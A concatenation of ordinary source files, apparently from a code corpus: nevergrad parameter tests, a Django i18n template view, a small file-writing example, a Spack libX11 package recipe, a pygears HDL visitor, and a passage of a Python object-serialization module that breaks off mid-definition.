param = par.Tuple(par.Scalar(1.0, mutable_sigma=True).set_mutation(sigma=5))
param2 = par.Tuple(par.Scalar(1.0, mutable_sigma=True).set_mutation(sigma=1))
param.value = (1,)
param2.value = (3,)
param.recombine(param2)
assert param.value[0] == 2.0
param2.set_standardized_data(
(param.get_standardized_data(reference=param2) + param2.get_standardized_data(reference=param2)) / 2
)
assert param2.value[0] == 2.5
def _false(value: tp.Any) -> bool: # pylint: disable=unused-argument
return False
def test_endogeneous_constraint() -> None:
param = par.Scalar(1.0, mutable_sigma=True)
param.sigma.register_cheap_constraint(_false)
assert not param.satisfies_constraints()
def _return_val(val: float) -> float: # pylint: disable=unused-argument
return val
@pytest.mark.parametrize("val,expected", [(1.0, True), (0.0, True), (-1.0, False)]) # type: ignore
def test_float_constraint(val: float, expected: bool) -> None:
param = par.Scalar(val, mutable_sigma=True)
param.register_cheap_constraint(_return_val)
assert param.satisfies_constraints() is expected
@pytest.mark.parametrize("name", ["clipping", "arctan", "tanh", "constraint", "bouncing"]) # type: ignore
def test_constraints(name: str) -> None:
param = par.Scalar(12.0).set_mutation(sigma=2).set_bounds(method=name, lower=-100, upper=100)
param.set_standardized_data(param.get_standardized_data(reference=param))
np.testing.assert_approx_equal(param.value, 12, err_msg="Back and forth did not work")
param.set_standardized_data(np.array([100000.0]))
if param.satisfies_constraints():
# bouncing works differently from others
np.testing.assert_approx_equal(
param.value,
100 if name != "bouncing" else -100,
significant=3,
err_msg="Constraining did not work",
)
@pytest.mark.parametrize( # type: ignore
"param,expected",
[
(par.Scalar(), False),
(par.Scalar(lower=-1000, upper=1000).set_mutation(sigma=1), True),
(par.Scalar(lower=-1000, upper=1000, init=0).set_mutation(sigma=1), False),
(par.Scalar().set_bounds(-1000, 1000, full_range_sampling=True), True),
],
)
def test_scalar_sampling(param: par.Scalar, expected: bool) -> None:
spawned_vals = [np.abs(param.spawn_child().value) for _ in range(10)]
sampled_vals = [np.abs(param.sample().value) for _ in range(10)]
assert not np.any(np.array(spawned_vals) > 100)
assert np.any(np.array(sampled_vals) > 100) == expected
def test_log() -> None:
with pytest.warns(errors.NevergradRuntimeWarning) as record:
log = par.Log(lower=0.001, upper=0.1, init=0.02, exponent=2.0)
assert log.value == pytest.approx(0.02)
assert not record, [x.message for x in record] # TODO readd
par.Log(lower=0.001, upper=0.1, init=0.01, exponent=10.0)
assert len(record) == 1, [x.message for x in record]
# automatic
log = par.Log(lower=0.001, upper=0.1)
assert log.value == pytest.approx(0.01)
log.set_standardized_data([2.999])
np.testing.assert_almost_equal(log.value, 0.09992, decimal=5)
def test_bounded_scalar() -> None:
scalar = par.Scalar(lower=0.0, upper=0.6)
np.testing.assert_almost_equal(scalar.sigma.value, 0.1)
np.testing.assert_almost_equal(scalar.value, 0.3)
# partial
with pytest.raises(ValueError):
scalar = par.Scalar(lower=1.0)
def test_ordered_choice() -> None:
choice = par.TransitionChoice([0, 1, 2, 3], transitions=[-1000000, 10])
assert len(choice) == 4
assert choice.value == 2
choice.value = 1
assert choice.value == 1
choice.mutate()
assert choice.value in [0, 2]
assert choice.get_standardized_data(reference=choice).size
choice.set_standardized_data(np.array([12.0]))
assert choice.value == 3
def test_ordered_choice_weird_values() -> None:
choice = par.TransitionChoice([0, np.nan, np.inf])
choice.value = np.nan
assert choice.value is np.nan
choice.value = np.inf
assert choice.value == np.inf
def test_choice_repetitions() -> None:
choice = par.Choice([0, 1, 2, 3], repetitions=2)
choice.random_state.seed(12)
assert len(choice) == 4
assert choice.value == (0, 2)
choice.value = (3, 1)
assert choice.indices.value.tolist() == [3, 1]
choice.mutate()
def test_transition_choice_repetitions() -> None:
choice = par.TransitionChoice([0, 1, 2, 3], repetitions=2)
choice.random_state.seed(12)
assert len(choice) == 4
assert choice.value == (2, 2)
choice.value = (3, 1)
np.testing.assert_almost_equal(choice.indices.value, [3, 1], decimal=3)
choice.mutate()
assert choice.value == (3, 0)
def test_array_bounded_initialization() -> None:
array = par.Array(shape=(1,), lower=-1)
assert array.value[0] == 0
assert array.bounds == (-1, None) # type: ignore
assert array.sigma.value == 1.0
array = par.Array(shape=(1,), lower=-0.5, upper=2.5)
assert array.value[0] == 1
assert array.bounds == (-0.5, 2.5) # type: ignore
assert array.sigma.value == 0.5
@pytest.mark.parametrize("method", ["clipping", "arctan", "tanh", "constraint", "bouncing"]) # type: ignore
@pytest.mark.parametrize("exponent", [2.0, None]) # type: ignore
@pytest.mark.parametrize("sigma", [1.0, 1000, 0.001]) # type: ignore
def test_array_sampling(method: str, exponent: tp.Optional[float], sigma: float) -> None:
mbound = 10000.0
param = par.Array(init=2 * np.ones((2, 3))).set_bounds(
[1.0, 1, 1], [mbound] * 3, method=method, full_range_sampling=True
)
param.set_mutation(exponent=exponent, sigma=sigma)
new_param = param.sample()
val = new_param.value
assert np.any(np.abs(val) > 10)
assert np.all(val <= mbound)
assert np.all(val >= 1)
def test_parenthood() -> None:
param = par.Instrumentation(par.Scalar(init=1.0, mutable_sigma=True).set_mutation(exponent=2.0, sigma=5))
sigma_uid = param[0][0].sigma.uid # type: ignore
param_samp = param.sample()
param_spawn = param.spawn_child()
assert param_samp[0][0].sigma.parents_uids == [] # type: ignore
assert param_spawn[0][0].sigma.parents_uids == [sigma_uid] # type: ignore
def test_random_state_initialization() -> None:
param = par.Dict(x=par.Choice(4), y=par.Choice(10))
param.value # pylint: disable=pointless-statement
assert param["x"].random_state is param["y"].random_state
|
the-stack_0_25272
|
# -*- coding: utf-8 -*-
import urls
from django.core.exceptions import ImproperlyConfigured
from django.views.generic import TemplateView
from django.conf import settings
class StaticPageView(TemplateView):
"""
    This view extends (more precisely, overrides)
    TemplateResponseMixin's get_template_names
    in order to intercept the currently selected language code
    and adjust the template path accordingly.
    It is assumed that the templates live under dedicated directories,
    named after the language codes, i.e.:
- en
- footer_chi_siamo.html
- contatti.html
- it
- footer_chi_siamo.html
- contatti.html
"""
template_language = None
page_url_name = None
page_label = {}
def get_template_names(self):
"""
Returns a list of template names to be used for the request. Must return
a list. May not be called if render_to_response is overridden.
"""
if self.template_language is None:
if self.request.LANGUAGE_CODE is None:
raise ImproperlyConfigured(
"I18NTemplateView requires either a definition of "
"'template_language' or an implementation of 'get_template_language()'")
else:
self.template_language = self.request.LANGUAGE_CODE
configured_languages = dict(settings.LANGUAGES).keys()
        if self.template_language not in configured_languages:
            raise ImproperlyConfigured(
                "I18NTemplateView requires 'template_language' "
                "to be one of the languages specified in the settings")
if self.template_name is None:
raise ImproperlyConfigured(
"I18NTemplateView requires either a definition of "
"'template_name' or an implementation of 'get_template_names()'")
return ["{0}/{1}".format(self.template_language, self.template_name)]
def get_context_data(self, **kwargs):
context = super(StaticPageView, self).get_context_data(**kwargs)
context['page_label'] = self.page_label
context['page_url_name'] = self.page_url_name
return context
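# Illustrative wiring sketch (not part of the original module): how StaticPageView
# might be hooked into a urlconf. The url pattern, url name and template name below
# are assumptions invented for the example; only the per-language template layout
# described in the docstring above comes from the original code.
#
#   from django.conf.urls import url
#
#   urlpatterns = [
#       url(r'^chi-siamo/$',
#           StaticPageView.as_view(template_name='footer_chi_siamo.html',
#                                  page_url_name='chi_siamo'),
#           name='chi_siamo'),
#   ]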
class CooperazioneView(StaticPageView):
"""
    This view extends StaticPageView and is used to show
    the pages under cooperazione_italiana.
    It injects a cooperazione_pages key into the context;
    cooperazione_pages is imported from the urls module (in this pages package).
"""
def get_context_data(self, **kwargs):
context = super(CooperazioneView, self).get_context_data(**kwargs)
context['cooperazione_pages'] = urls.cooperazione_pages
return context
|
the-stack_0_25275
|
"""
Content under Creative Commons Attribution license CC-BY 4.0,
code under MIT license (c)2018 Sergio Rojas ([email protected])
http://en.wikipedia.org/wiki/MIT_License
http://creativecommons.org/licenses/by/4.0/
Created on April, 2018
Last Modified on: May 15, 2018
This program illustrates how to write data to a file. If the file exists,
it will be overwritten and the existing data will be lost
"""
thefile = 'chap04_write_test_file.txt'
colsLabel = ['x', 'x*x', 'x*x*x']
values = [ [1, 1, 1], [2, 4, 8] ]
try:
with open(thefile, 'wt') as openedFile:
for cols in colsLabel:
openedFile.write('{0} '.format(cols))
openedFile.write('\n')
for cols in values:
for rows in cols:
openedFile.write('{0} '.format(rows))
openedFile.write('\n')
except Exception as errorCapturado:
print("\t The following error happened when opening the file")
print("\t *** {0} ***".format(type(errorCapturado)))
# The next instruction shows that the opened file was closed
# This line should be deleted
# print(openedFile.closed)
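# Illustrative companion sketch (not part of the original script): reading the file
# written above back in, assuming the whitespace-separated layout produced by the
# loops in the try-block.
#
#   with open(thefile, 'rt') as readFile:
#       header = readFile.readline().split()
#       rows = [[int(v) for v in line.split()] for line in readFile]
#   # header -> ['x', 'x*x', 'x*x*x'], rows -> [[1, 1, 1], [2, 4, 8]]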
|
the-stack_0_25276
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libx11(AutotoolsPackage, XorgPackage):
"""libX11 - Core X11 protocol client library."""
homepage = "https://www.x.org/"
xorg_mirror_path = "lib/libX11-1.6.7.tar.gz"
version('1.7.0', sha256='c48ec61785ec68fc6a9a6aca0a9578393414fe2562e3cc9cca30234345c7b6ac')
version('1.6.7', sha256='f62ab88c2a87b55e1dc338726a55bb6ed8048084fe6a3294a7ae324ca45159d1')
version('1.6.5', sha256='3abce972ba62620611fab5b404dafb852da3da54e7c287831c30863011d28fb3')
version('1.6.3', sha256='0b03b9d22f4c9e59b4ba498f294e297f013cae27050dfa0f3496640200db5376')
depends_on('[email protected]:')
depends_on('[email protected]:', when='@1.7.0:')
depends_on('[email protected]:')
depends_on('xextproto')
depends_on('xtrans')
depends_on('kbproto')
depends_on('inputproto')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
depends_on('perl', type='build')
def configure_args(self):
config_args = []
# -Werror flags are not properly interpreted by the NVIDIA compiler
if self.spec.satisfies('%nvhpc@:20.11'):
config_args.append('--disable-selective-werror')
return config_args
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path('XLOCALEDIR', self.prefix.share.X11.locale)
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path('XLOCALEDIR', self.prefix.share.X11.locale)
@property
def libs(self):
for dir in ['lib64', 'lib']:
libs = find_libraries('libX11', join_path(self.prefix, dir),
shared=True, recursive=False)
if libs:
return libs
return None
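    # Illustrative command-line usage (a sketch; the versions shown are ones
    # declared above, everything else is the standard Spack workflow):
    #   $ spack install [email protected]
    #   $ spack spec libx11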
|
the-stack_0_25279
|
import datetime
import logging
import daiquiri
from constants import modelconstants
def get_logger(name):
daiquiri.setup(
level=logging.DEBUG,
outputs=(
daiquiri.output.File(modelconstants.LOG_FILE_PATH, level=logging.DEBUG),
daiquiri.output.TimedRotatingFile(
modelconstants.LOG_FILE_PATH,
level=logging.DEBUG,
interval=datetime.timedelta(weeks=356))
)
)
logger = daiquiri.getLogger(name)
return logger
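# Illustrative usage (a sketch; assumes modelconstants.LOG_FILE_PATH points at a
# writable location):
#   logger = get_logger(__name__)
#   logger.info("model training started")
#   logger.debug("processed %s records", 128)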
|
the-stack_0_25282
|
from ..ir_utils import HDLVisitor, ir, res_false, res_true
from pygears.typing import Bool
class CycleDone(HDLVisitor):
def LoopBlock(self, node):
if '_state' in self.ctx.scope:
node.stmts.insert(
0,
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=self.ctx.ref('_state', ctx='en')))
else:
node.stmts.insert(
0,
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=res_false))
node.stmts.append(
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=res_true))
def infer_cycle_done(block, ctx):
ctx.scope['cycle_done'] = ir.Variable('cycle_done', Bool)
block.stmts.insert(
0, ir.AssignValue(ctx.ref('cycle_done', 'store'), res_true))
CycleDone(ctx).visit(block)
return block
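# Rough sketch of the resulting statement order (inferred from the code above,
# shown here only as comments):
#
#   cycle_done = True            # inserted at the top of the enclosing block
#   loop:
#       cycle_done = False       # or a copy of '_state' when one is in scope
#       ... original loop body ...
#       cycle_done = True        # appended at the end of the loop body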
|
the-stack_0_25284
|
'''serialize/deserialize almost any kind of python object'''
# TODO:
# memoryview -- not possible? .tolist or .tobytes will return the data, but i haven't found a way to get the object that it references
# bytearray -- use str() to get the data
# operator.methodcaller -- can be done by using an object with __getattr__ for the name, and grabbing the method's *args, **kwds for the default args. hopefully doing this doesn't influence state...
# TODO: add a decorator that can transform anything into an object that will pass an instance of self
# to serialization service
import sys
if sys.version_info.major < 3:
    import __builtin__ as builtins, types
else:
    import builtins, types
__all__ = ['caller', 'pack', 'unpack', 'loads', 'dumps']
VERSION = '0.7'
## FIXME: none of these are enabled due to their hackiness, search for XXX
# attribute[ignore=list of fu type names] -- ignore serializing/deserializing these types
# attribute[globals=dict] -- use the provided dict as the globals for deserialized objects
# attribute[exclude=list of var names] -- ignore serializing/deserializing these specific names
# attribute[local=list of module names] -- use the local versions of these modules
# attribute[recurse={type name : [list of types]}] -- only recurse into these types from this type
# attribute[norecurse={type name : [list of types]}] -- don't recurse into these types from this type
########
class package:
'''
This class is responsible for exposing the interface used to marshal/unmarshal
    an object. The reason for the class is to close around the internals of this
    module, hiding the functionality that is used for serialization. The only
    interfaces that are exposed are the pack() and unpack() classmethods.
'''
@classmethod
def pack(cls, object, **attributes):
'''convert any python object into a packable format'''
st = cls.stash()
id = st.store(object, **attributes)
return VERSION, id, st.packed()
@classmethod
def unpack(cls, data, **attributes):
'''unpack data into a real python object'''
ver, id, data = data
if ver != VERSION:
raise AssertionError('fu.package.unpack : invalid version %s != %s'%(ver, VERSION))
st = cls.stash()
st.unpack(data)
return st.fetch(id, **attributes)
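    # Illustrative round-trip (a sketch, not part of the original module): pack an
    # object graph into the versioned tuple and restore it from that tuple alone.
    #
    #   packed = package.pack({'answer': 42, 'items': [1, 2, 3]})
    #   restored = package.unpack(packed)
    #   assert restored == {'answer': 42, 'items': [1, 2, 3]}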
### stuff that's hidden within this namespace
class cache(object):
'''
This class is used to handle the registration of the different serializers
and deserializers for a python type/constant. The registration of the
different implementations is done via decorator at which point one can
use the .by*() classmethods to identify the handler for their type or
instance.
'''
class registration:
id, const, type = {}, {}, {}
@staticmethod
def hash(data):
agg = 5381
for item in iter(data):
agg = (((agg<<5) + agg) ^ ord(item)) & 0xffffffff
return agg
## registration of a cls into cache
@classmethod
def register(cls, definition):
id = cls.registration.hash(definition.__name__)
#id = definition.__name__
if id in cls.registration.id:
raise KeyError("Duplicate id %x in cache"% id)
cls.registration.id[id] = definition
definition.id = id
return definition
@classmethod
def register_type(cls, definition):
'''registers the definition with the specified builtin type'''
type = definition.getclass()
if type in cls.registration.type:
raise KeyError("Duplicate type %r in cache"% type)
definition = cls.register(definition)
cls.registration.type[type] = definition
return definition
@classmethod
def register_const(cls, definition):
const = definition.getclass()
if const in cls.registration.const:
raise KeyError("Duplicate constant %r in cache"% const)
definition = cls.register(definition)
cls.registration.const[const] = definition
return definition
## determining a registered cls from various types
@classmethod
def byid(cls, id):
'''search through globastate.id for a definition'''
return cls.registration.id[id]
@classmethod
def byclass(cls, type):
'''search through registration.type for a definition'''
return cls.registration.type[type]
@classmethod
def byconst(cls, const):
'''search through registration.const for a definition'''
result = cls.registration.const[const]
if result.getclass() is not const:
raise KeyError(const)
return result
@classmethod
def byinstance(cls, instance):
'''iterate through all registered definitions to determine which one can work for serialization/deserialization'''
global package, object_, module_
type, object, module = types.TypeType if sys.version_info.major < 3 else builtins.type, types.ObjectType if sys.version_info.major < 3 else builtins.object, types.ModuleType
t = type(instance)
# any constant
try:
return package.cache.byconst(instance)
except (KeyError, TypeError):
pass
# special types
if t is module and instance is not module:
# XXX: implement binary modules
if hasattr(instance, '__file__'):
if instance.__file__.endswith('.pyd'):
raise NotImplementedError('Binary modules are un-supported')
return module_
return module_local
# by type
try:
return package.cache.byclass(t)
except (KeyError, TypeError):
pass
# builtins for known-modules that can be copied from
if t == builtin_.getclass():
if instance.__module__ is None:
#return incomplete # XXX
raise KeyError(instance, 'Unable to determine module name from builtin method')
return builtin_
# catch-all object
if hasattr(instance, '__dict__') or hasattr(instance, '__slots__'): # is this an okay assumption?
return object_
# FIXME: if it follows the pickle protocol..
if hasattr(instance, '__getstate__'):
raise NotImplementedError('Pickle protocol for type %r is unimplemented'% instance)
pickle.loads(pickle.dumps(instance))
return incomplete
raise KeyError(instance)
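    # Illustrative lookups (a sketch): the registration tables can be queried
    # directly to see which handler would serialize a given value. The handlers
    # named here are the ones registered further below.
    #
    #   package.cache.byinstance(42)       # -> the integer handler (int_)
    #   package.cache.byclass(type(''))    # -> the string handler (str_)
    #   package.cache.byconst(None)        # -> the handler for the None constant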
class stash(builtins.object):
'''
This class is used to recursively serialize/deserialize an instance or
type. It is temporarily constructed and will use the cache to identify
how to serialize/deserialize the data that is passed to it. Once all
the references are processed, a tuple of the objects and constants are
then returned. This can then be re-packed into a bytestream which can
then be transported wherever the user needs it.
'''
def __init__(self):
# cache for .fetch
self.fetch_cache = {}
self.store_cache = builtins.set()
# caches for .store
self.cons_data = {}
self.inst_data = {}
@staticmethod
def clsbyid(item): return package.cache.byid(item)
@staticmethod
def clsbyinstance(item): return package.cache.byinstance(item)
# FIXME: should prolly implement __str__, __unicode__, and __repr__
def __repr__(self):
cons = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.cons_data.items()]
inst = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.inst_data.items()]
return "<class '%s'> %s"%(self.__class__.__name__, builtins.repr({key : item for key, item in cons}))
## serializing/deserializing entire state
def packed(self):
return self.cons_data, self.inst_data
def unpack(self, data):
cons, inst = data
self.cons_data.clear()
self.inst_data.clear()
self.cons_data.update(cons)
self.inst_data.update(inst)
return True
## packing/unpacking of id's
def pack_references(self, data, **attributes):
'''converts object data into reference id's'''
if data.__class__ is ().__class__:
return ().__class__(self.store(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.store(k, **attributes) : self.store(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
# a list contains multiple packed objects
return [self.pack_references(item, **attributes) for item in data]
return data
def unpack_references(self, data, **attributes):
'''converts packed references into objects'''
if data.__class__ is ().__class__:
return ().__class__(self.fetch(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.fetch(k, **attributes) : self.fetch(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
return [self.unpack_references(item, **attributes) for item in data]
return data
def identify(self, object):
return id(object)
# unique id generator for .identify if id is not guaranteed to be unique (python 2.6?)
#if not hasattr(self, '__identity'):
# self.__identity = []
#if object in self.__identity:
# return self.__identity.index(object)
#self.__identity.append(object)
#return self.identify(object)
def __getitem__(self, name):
return self.identify(name)
### stashing/fetching of objects
def store(self, object, **attributes):
identity = self.identify(object)
if identity in self.store_cache:
return identity
cls = self.clsbyinstance(object)
if False: # XXX: if we want to make the module and name part of the protocol. (for assistance with attributes)
# get naming info
modulename, name = getattr(object, '__module__', None), getattr(object, '__name__', None)
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# store constructor info
data = cls.p_constructor(object, **attributes)
self.store_cache.add(identity)
data = self.pack_references(data, **attributes)
self.cons_data[identity] = cls.id, data
# self.cons_data[identity] = cls.id, (modulename, name), data # XXX: for attributes by name
# recurse into instance data
data = cls.p_instance(object, **attributes)
data = self.pack_references(data, **attributes)
self.inst_data[identity] = cls.id, data
return identity
def fetch(self, identity, **attributes):
if identity in self.fetch_cache:
return self.fetch_cache[identity]
# unpack constructor
# _, (modulename, name), data = self.cons_data[identity] # XXX: for attributes by name
_, data = self.cons_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
if False: # XXX: attributes
# naming info
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
instance = incomplete.new()
self.fetch_cache[identity] = instance
return instance
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# create an instance of packed object
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
# update instance with packed attributes
_, data = self.inst_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError('%s.fetch(%d) : constructed instance is different from updated instance'% (builtins.object.__repr__(self), identity))
return instance
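    # Illustrative use of stash on its own (a sketch; package.pack/package.unpack
    # simply wrap this sequence):
    #
    #   st = package.stash()
    #   identity = st.store([1, 2, {'k': 'v'}])
    #   cons, inst = st.packed()           # plain dicts keyed by object identity
    #   st2 = package.stash()
    #   st2.unpack((cons, inst))
    #   st2.fetch(identity)                # -> [1, 2, {'k': 'v'}]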
class __type__(builtins.object):
'''
This base class is used to help register an instance of a type. Once
identifying the type of an instance, the class will be responsible for
returning any attributes that are necessary to re-construct or
re-instantiate that object.
'''
@classmethod
def getclass(cls, *args, **kwds):
'''
This returns the type to search for. The type is snuck from an instance
by using the __class__ attribute.
'''
raise NotImplementedError(cls)
@classmethod
def new(cls):
'''
This method returns an instance of the type that the class is supposed
to be responsible for.
'''
return cls.getclass()
@classmethod
def repr(cls, object):
'''
This method will output an instance in a readable manner.
'''
return repr(object)
@classmethod
def p_constructor(cls, object, **attributes):
'''
        This method will extract any attributes that are required to create
the initial instance of a type. The necessary attributes are then
returned as a tuple.
'''
return ()
@classmethod
def p_instance(cls, object, **attributes):
'''
This method will extract any attributes that will be updated after
the type has been instantiated. It is prudent to note that these
attributes are not necessary to construct the object, only that the
object's users expect these fields to be set. The necessary attributes
are then returned as a tuple.
'''
raise NotImplementedError(cls)
@classmethod
def u_constructor(cls, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and use it to re-instantiate the specified type. The tuple in data is
the same as the tuple returned by the p_constructor() classmethod. The
method will return the properly instantiated type.
'''
raise NotImplementedError(cls)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and do whatever is necessary to update the instance parameter with it.
This can include (but is not limited to), assigning any attributes with
the setattr() keyword, calling any methods to update the state, etc.
The tuple in data corresponds to the tuple returned by the p_instance()
classmethod. The method will then return the instance that was updated.
'''
return instance
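# Minimal sketch of a handler following the protocol documented above. The names
# MyType and mytype_ are invented for illustration; the real handlers registered
# below follow the same shape.
#
#   @package.cache.register_type
#   class mytype_(__type__):
#       @classmethod
#       def getclass(cls): return MyType
#       @classmethod
#       def p_constructor(cls, object, **attributes): return ()
#       @classmethod
#       def u_constructor(cls, data, **attributes): return MyType()
#       @classmethod
#       def p_instance(cls, object, **attributes): return object.__dict__
#       @classmethod
#       def u_instance(cls, instance, data, **attributes):
#           instance.__dict__.update(data)
#           return instance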
@package.cache.register_type
class incomplete(__type__):
'''just a general type for incomplete objects'''
class partialinstance(object):
__name__ = '--incomplete--'
def __getattr__(self, attribute):
message = 'unable to access attribute "%s" from incomplete type "%s"'
raise Exception(message% (attribute, self.__name__))
def __call__(self, *args, **kwds):
message = 'unable to call incomplete type "%s"'
raise Exception(message% (self.__name__))
def __repr__(self):
return "%s %s"%( self.__class__, self.__name__ )
@classmethod
def getclass(cls):
return cls.partialinstance
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@classmethod
def p_instance(cls, object, **attributes):
return ()
### constants
if 'constants':
class __constant(__type__):
'''
This parent class is used to assist defining a constant. A constant
will typically not have any attributes or anything and in most cases
will only exist once in an interpreter. These are things like the
"object" type, or "float" type, etc.
'''
@classmethod
def new(cls, *args, **kwds):
'''
This method will create a new instance of the class returned by
the getclass() classmethod with the parameters provided as its
arguments.
'''
return cls.getclass()(*args, **kwds)
@classmethod
def p_instance(cls, object, **attributes):
'''
As the type is a constant, there are no attributes that are needed
to update the type. This method will simply return an empty tuple.
'''
return ()
@classmethod
def u_constructor(cls, data, **attributes):
'''
As the type is a constant, there are no parameters needed to
construct it. this method will simply return the type returned by
the getclass() classmethod.
'''
return cls.getclass()
@package.cache.register_const
class type(__constant):
@classmethod
def getclass(cls):
return builtins.type
@package.cache.register_const
class object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@package.cache.register_const
class module(__constant):
@classmethod
def getclass(cls):
return builtins.__class__
@classmethod
def instancelocal(cls, modulename, **kwds):
# XXX: this might be broken when re-constructing package modules
# where relative imports are used.
return __import__(modulename)
@classmethod
def instance(cls, modulename, doc=None):
try:
return cls.instancelocal(modulename, doc=doc)
except ImportError:
pass
return cls.new(modulename, doc)
@package.cache.register_const
class bool(__constant):
@classmethod
def getclass(cls):
return builtins.bool
@package.cache.register_const
class int(__constant):
@classmethod
def getclass(cls):
return (0).__class__
@package.cache.register_const
class float(__constant):
@classmethod
def getclass(cls):
return 0.0.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class long(__constant):
@classmethod
def getclass(cls):
return eval('0L').__class__
@package.cache.register_const
class complex(__constant):
@classmethod
def getclass(cls):
return 0j.__class__
@package.cache.register_const
class str(__constant):
@classmethod
def getclass(cls):
return ''.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class unicode(__constant):
@classmethod
def getclass(cls):
return u''.__class__
@package.cache.register_const
class buffer(__constant):
@classmethod
def getclass(cls):
return builtins.buffer('').__class__
else:
@package.cache.register_const
class bytes(__constant):
@classmethod
def getclass(cls):
return b''.__class__
@package.cache.register_const
class tuple(__constant):
@classmethod
def getclass(cls):
return ().__class__
@package.cache.register_const
class list(__constant):
@classmethod
def getclass(cls):
return [].__class__
@package.cache.register_const
class dict(__constant):
@classmethod
def getclass(cls):
return {}.__class__
@package.cache.register_const
class set(__constant):
@classmethod
def getclass(cls):
return {item for item in []}.__class__
@package.cache.register_const
class frozenset(__constant):
@classmethod
def getclass(cls):
return builtins.frozenset
@package.cache.register_const
class instancemethod(__constant):
@classmethod
def getclass(cls):
return cls.getclass.__class__
@package.cache.register_const
class property(__constant):
@classmethod
def getclass(cls):
return builtins.property
@package.cache.register_const
class code(__constant):
@classmethod
def getclass(cls):
res = lambda: None
return res.func_code.__class__ if sys.version_info.major < 3 else res.__code__.__class__
if sys.version_info.major < 3:
@classmethod
def new(cls, argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
else:
@classmethod
def new(cls, argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
@package.cache.register_const
class function(__constant):
@classmethod
def getclass(cls):
return (lambda:0).__class__
@classmethod
def new(cls, code, globs, **attributes):
'''Create a new function'''
name = attributes.get('name', code.co_name)
argdefs = attributes.get('argdefs', ())
closure = attributes.get('closure', ())
c = cls.getclass()
return c(code, globs, name, argdefs, closure)
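    # Illustrative use (a sketch): rebuild a callable from another function's code
    # object, which is what the function handler further below relies on.
    #
    #   inc = lambda x: x + 1
    #   code_obj = inc.func_code if sys.version_info.major < 3 else inc.__code__
    #   clone = function.new(code_obj, globals(), name='clone')
    #   assert clone(1) == 2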
@package.cache.register_const
class builtin(__constant):
@classmethod
def getclass(cls):
return builtins.setattr.__class__
@package.cache.register_const
class generator(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).__class__
@package.cache.register_const
class frame(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).gi_frame.__class__
@package.cache.register_const
class Staticmethod(__constant):
@classmethod
def getclass(cls):
return builtins.staticmethod
@package.cache.register_const
class Classmethod(__constant):
@classmethod
def getclass(cls):
return builtins.classmethod
## real constant
@package.cache.register_const
class none(__constant):
@classmethod
def getclass(cls):
return None
@package.cache.register_const
class true(__constant):
@classmethod
def getclass(cls):
return True
@package.cache.register_const
class false(__constant):
@classmethod
def getclass(cls):
return False
@package.cache.register_const
class notImplemented(__constant):
@classmethod
def getclass(cls):
return builtins.NotImplemented
@package.cache.register_const
class ellipsis(__constant):
@classmethod
def getclass(cls):
return builtins.Ellipsis
if sys.version_info.major < 3:
@package.cache.register_const
class file(__constant):
@classmethod
def getclass(cls):
return builtins.file
import _weakref
@package.cache.register_const
class weakref(__constant):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@package.cache.register_const
class super(__constant):
@classmethod
def getclass(cls):
